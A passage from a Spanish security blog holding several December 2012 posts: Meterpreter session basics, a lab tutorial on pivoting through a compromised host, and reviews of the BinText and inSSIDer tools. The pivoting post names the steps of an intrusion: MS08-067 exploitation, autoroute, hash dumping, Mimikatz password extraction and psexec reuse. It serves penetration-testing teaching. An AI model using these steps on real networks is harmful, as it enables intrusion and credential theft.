Puesto que nos encontramos en un post de introducción veremos los comandos básicos, en próximas ediciones veremos cosas mas interesantes, pero primero es necesario conocer estas ordenes pues nos serán de utilidad en cosas más avanzadas.

Sesiones en Metasploit
 En Metasploit es posible tener varias sesiones de meterpreter en ejecución simultáneamente, para listar todas las existentes podemos utilizar:
sessions -l

 Esto nos mostrará todas las que se encuentran abiertas ordenadas en función de un Id, para recuperar una en concreto basta con:

sessions -i <Id de la sesión>

Una vez hayamos acabado de trabajar con una sesión podemos cerrarla, para realizar esta tarea hay dos posibilidades:

Si estamos dentro de una sesión:        quitSino estamos dentro de ninguna sesión:        sessions -k <Id de la sesión>
Existen más posibles parámetros para el comando sessions, basta usar el flag -h para verlos.Con todo esto cerramos esta primera entrada a modo de introducción, en las siguientes ya iremos "escavando" en las posibilidades que ofrece meterpreter.Nos leemos en breve ;)

18 dic 2012

Pivoting con Meterpreter, ¡No es baloncesto!

Muchos dirán, ¿Por qué ese título? ¿Te has levantado gracioso? Yo siempre me levanto con la chispa que se merece la vida, pero no me voy a ir por las ramas y quiero hablar del pivoting. Es una técnica que llama mucho la atención de las personas, sobretodo pentesters y que deben utilizarla para poder llegar lejos en un test de intrusión.

Escenario

Por lo general, cuando se realiza un test de intrusión se tienen claras varias cosas, y una de las primordiales es que los servidores que tienen la info sensible, la pasta, los chanchullos, o los despidos no se encuentran en un server al alcance de todo el mundo. La segmentación, las VLAN, las ACLS, hacen que este juego sea más apasionante y más interesante que otros. Imaginaros una empresa que tiene un server con info sensible a la cual solo se puede acceder mediante una máquina, que es la única que tiene acceso. Nos dan un punto de entrada, que es un puesto cualquiera de la empresa, de una red cualquiera de la empresa...

¿Qué hago? ¿Por dónde empiezo?

Deberíamos tener claro, que si nos encontramos entre máquinas y redes Windows, deberemos escalar privilegios de alguna manera... Ese hecho esta fuera del post, os recomiendo Metasploit Para Pentesters, si... publicidad subliminal... Nosotros nos centraremos en podemos acceder a una máquina ya sea mediante un exploit o porque ya conocemos alguna credencial del dominio, pero ¿cómo hacemos para pivotar a la máquina que está detrás?

Utilizaremos un script que nos proporciona meterpreter para crear rutas entre mi máquina y las que, a priori, no podemos ver. Ya veréis que sencillo. También utilizaremos un scanner proporcionado en el conjunto de herramientas Auxiliary de Metasploit para realizar un escaneo rápido de puertos, y ver que máquinas encontramos en la nueva red.

El acceso a la primera máquina

Nosotros disponemos de una máquina con Metasploit en la red 10. Mi máquina tiene la dirección IP 10.0.0.2, podéis crearos el entorno de manera sencilla en Virtual Box, VMWare o Hyper-V... Existe una máquina en la red, la cual llamaremos pivote, que se encuentra tanto en la red 10, como en la red 11, con direcciones IP 10.0.0.1 y 11.0.0.1. Por otro lado existe la máquina deseada en la red 11, con la dirección IP 11.0.0.2.

Para empezar diremos que realizamos la explotación de la máquina pivote con la que tendremos acceso a máquina que se encuentren en otras redes. En un escenario real, podríamos decir que un DC sería una máquina pivote perfecta, ya que accederá a todas las redes donde haya máquinas Windows que se encuentren en el dominio. Para realizar la explotación depende del proceso anterior que hayamos intentado, podemos haber conseguido credenciales, mediante captura de tráfico u otras técnicas, pero por ejemplo usaremos el exploit más famoso del mundo MS08-067-netapi.

Ahora tenemos acceso a la máquina pivote o que realizará el pivote. Antes de nada miraremos a ver la configuración que esta máquina tiene en la nueva red a la que tenemos acceso. El objetivo de esto es ver a que rango tiraremos el escáner.

Para crear la ruta en el contexto de Metasploit y Meterpreter utilizaremos el script autoroute. Su sintaxis es sencilla run autoroute -s <red> -n <máscara red>. En la siguiente imagen se puede visualizar de manera clara.

Si realizamos background, sin cerrar la sesión, se puede visualizar las rutas y las sesiones en las que están construidas, es interesante tener un esquema claro, cuando en una empresa hay un gran número de segmentos o redes por los que poder pivotar.

Ahora toca configurar el escáner, podemos utilizar las herramientas de tipo Auxiliary que proporciona Metasploit. Por ejemplo utilizaremos Auxiliary/scanner/portscan/tcp. Realizaremos un escaneo a la red 11, que es la nueva red descubierta y probaremos a ver que máquinas hay y que puertos están abiertos. Para hacerlo rápido colocaremos 3 puertos a escanear solamente. Se puede observar como estamos teniendo conectividad con máquinas de una red con la que antes no teníamos... Interesante, interesante... ¿Y esto se puede hacer escalable y montar varios pivotes? Sí.

Para probar la nueva conectividad con la máquina 11.0.0.2 tiraremos el exploit de antes pero ahora contra esa máquina que nos intriga y que tiene esos puertos abiertos... Veremos que es un Windows 7 y que no es vulnerable a este exploit.

Por úlitmo, si hemos hecho un proceso de recopilación de hashes son run hashdump, podriamos utilizar el hash de administrador local por si acaso es el mismo en la otra máquina, o si hacemos un run post/windows/gather/smart_hashdump podemos sacar hashes de usuarios de dominio si estuviéramos en un DC. Otra opción es subir un WCE 1.3 o Mimikatz para sacar pass en claro del proceso LSASS.EXE... hay muchas opciones... Imaginemos que tenemos la clave o impersonalizamos el hash.

El módulo elegido es el de autenticación de SMB, exploit/windows/smb/psexec... Interesante, muy interesante... Nuestro pivote ha funcionado correctamente y nos ha permitido acceder a máquinas más allá de nuestra red donde nos han colocado a hacer la auditoría.

17 dic 2012

Herramientas forense para ser un buen CSI. Parte XV: BinText

Buenas a todos, hoy estamos aqui una semana más para alimentar la cadena sobre análisis forense "herramientas forense para ser un buen CSI". Hoy hablaremos de la utilidad "Bintext" que nos ofrece gratuitamente la empresa McAfee.
Bintext es una pequeña herramienta muy básica pero a su vez muy potente, que nos permite extraer cadenas de texto de cualquier tipo de archivo. Nos será de especial utilidad, entre otras cosas, para recuperar texto legible de archivos ejecutables. Por ejemplo si quisiesemos ver las cadenas de texto que contiene el núcleo de flub0.5.2:



La herramienta os recordará al comando "strings".Por otro lado bintext permite hacer búsquedas y aplicar algunos filtros interesantes:

En resumen, otra utilidad que no puede faltar en vuestra galería :)
saludos!

16 dic 2012

Informe Flu – 102

Comenzamos con el resumen de una semana cargada de contenidos:

Lunes 11 de DiciembreMartes 12 de DiciembreMiércoles 13 de DiciembreJueves 14 de Diciembre
  • El jueves nuestro colaborador DoLpHiN publicó uno de los artículos más vistos de la semana y en el que nos hablaba sobre cómo acceder a un Windows 8 como administrador sin tener una cuenta previa y en el que nos explicaba como sigue vigente la técnica del "sethc" pero con otro ejecutable: Acceder a Windows 8 como administrador sin saber la contraseña

Viernes 15 de Diciembre

Sábado 16 de Diciembre
  • Anoche tuvimos el placer de celebrar el 2º aniversario de Flu Project con una cena (y post-cena :) en "nuestro barrio", ese pequeño barrio de Móstoles donde Pablo y un servidor nos criamos y desde donde preparamos los contenidos que día tras día publicamos en la red. Queremos agradecer a nuestros colaboradores y respectivas parejas que nos han acompañado en una noche tan especial para nosotros, y sobretodo a las "respectivas" que aguantan que les robemos tantas horas a los días para dedicárselas a nuestra pasión, Flu Project :-) Gracias a todos, a vosotros y a nuestros lectores, y permitidme que pida prestada la expresión a Angelucho para deciros que... ¡SOIS GRANDES! - La primera cena de Flu

15 dic 2012

La primera cena: Flu invita

El titulo lo dice todo, hoy no es día de post de seguridad, hoy es día de agradecimiento. El día 12 de Diciembre hizo 2 años que Flu Project se registraba en Internet, el día 14 hizo 2 años del primer post y el día 29 hará dos años que día a día comentamos cosas, cuentistas para algunos, gente que intenta comunicar el poco conocimiento que podemos tener, somos lo que somos gracias a todos los lectores diarios. Hoy tenemos una cita con nuestra pequeña historia, dos chicos de Móstoles que un día pintaron un muñeco en un paint y le llamaron Flu, dos chicos de Móstoles que un día hicieron un troyano con 300 MB de dependencias y dijeron podemos enseñar como se hace, como funciona y daroslo a vosotros... jugar con él! dos chicos que intentan crecer día a día, en lo personal y en lo profesional, y que cada día se hace más complicado en el mundo que vivimos... Por eso es un orgullo contar que Flu realizará su primera cena de Navidad con la que poder festejar estas fechas, seguimos siendo muuuuy pequeñitos, y solo hay 4 invitados más Juanan y yo, pero queremos hacer participe a todos aquellos colaboradores que han hecho que Flu salga día a día, a todas aquellas personas que han mejorado el troyano, a todos aquellos que te dan ánimos, que te dan las gracias por hacer algo que en el fondo te encanta... a todos ellos gracias.

 

Como olvidar la primera charla, en casa... la Universidad, aquel sitio en el que grandes egos luchan por ser... nada, mi Universidad, la quiero y la critico, así somos... todo puede mejorar! Todo empezó allí, aquella charla que aun recuerdo donde aquel hombre que metía sus credenciales en un locutorio de Alicante para mirar sus cuentas bancarias aprendió que no debía hacerlo, aquel profesor nuestro que decía que metíamos miedo por meter... el tiempo nos dio la razón... Esta imagen refleja bien lo que hace Flu en estos dos años, lo que somos dos jóvenes que solo quieren vivir experiencias, aprender, comunicar y sobretodo... día a día, mejorar!

Hoy, brindaremos por todos vosotros, porque queremos que seáis participes de nuestra pequeña fiesta de Navidad, porque sin ti, lector, no seríamos nada, ni estas líneas valdrían... Gracias a todos!

14 dic 2012

Buscando redes con inSSIDer -- Windows && Android

Hoy conoceremos inSSIDer, una aplicación para obtener información de redes inalámbricas bajo Windows y que conocí gracias al señor @a5rojo un día que íbamos a realizar cierta POC... ... ...

  Dicha aplicación nos muestra datos sobre las redes que tenemos alrededor como puede ser su canal, su cifrado, intensidad y un largo etc todo esto de forma muy bonita y con solo pulsar un simple botón. Para descargarla basta con dirigirnos a la web de los desarrolladores:
http://files.metageek.net/downloads/inSSIDer-Installer-2.1.6.1394.msi

Su instalación es rápida y en breve estaremos frente a su intuitiva interfaz:

 
 

  En la parte superior veremos las redes junto con su ESSID, BSSID, intensidad, cifrado... y en la parte inferior (pestaña Time Graph) en forma de gráfica las variaciones de señal sobre los distintos puntos de acceso.

  Las dos pestañas siguientes permiten ver las redes que se encuentran en el espectro de los 2.4 GHz y 5 GHz respectivamente mostrando una gráfica en función de la intensidad con que son recibidas:
 

  Además la aplicación ofrece opciones de filtrado y clasificación de las redes en función de la información que se desee mostrar por pantalla, así como también, opciones para interactuar con el GPS (que no dispongo y no he podido probar :D ).

  Pero aquí no acaba todo, pues existe una versión para MAC OS X (que no voy a analizar) y para Android, ambas gratuitas.  La del sistema operativo del robot verde la podemos descargar desde Google Play:
 

 

https://play.google.com/store/apps/details?id=net.metageek

 Su interfaz es distinta respecto a la versión de escritorio, aunque la información que nos muestra es similar. Desde ESSID, BSSID, canal, intensidad...

  En la primera de sus pestañas (Networks) vemos información sobre las redes que hay en su alcance y si estamos conectados a una una pequeña gráfica sobre su señal:

 

  Las sucesivas pestañas muestran lo saturados que están los canales (channels) e información sobre los espectros de 2.4 GHz y 5GHz de forma similar que su versión mayor y de forma muy resultona:

 
 
 

 En resumen, una aplicación interesante, fácil de utilizar y gratuita que permite ver que se cuece a nuestro alrededor.Nos leemos en breve (si tengo tiempo) :D